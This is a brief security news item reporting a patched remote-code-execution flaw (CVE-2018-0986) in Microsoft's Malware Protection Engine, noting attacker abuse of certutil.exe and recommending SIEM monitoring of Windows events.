Delaware, USA – April 5, 2018 – Another emergency update was released to fix a critical vulnerability in Microsoft Malware Protection Engine. MMPE is a part of several security solutions, including Windows Defender, which is used by default in Windows 10. The vulnerability allows attackers to execute malicious code on the victim’s system. To compromise a system, it is enough to email a specially created RAR archive or to initiate downloading of the archive from the web page. Scanning such a file with a vulnerable Microsoft anti-virus solution can lead to malicious code execution with LocalSystem rights. The vulnerability CVE-2018-0986 is fixed in the MMPE version 1.1.14700.5, the update is installed automatically and doesn’t need user interaction, but it is advisable to make sure that your security policies do not block MMPE updates.
It is also worth noting that security researcher Xavier Mertens published a note on how cybercriminals can bypass security solutions using the legitimate Windows certutil.exe tool. Last week we wrote about a similar technique used to deliver Sanny infostealer, and F5 reported the campaign distributing Electroneum cryptocurrency miners that uses certutil.exe for malware delivery.
To monitor security events on Windows-based systems, you can leverage your SIEM and Windows Security Monitor use case, which performs statistical analysis and profiling of Windows and Active Directory events to detect anomalies and suspicious activity.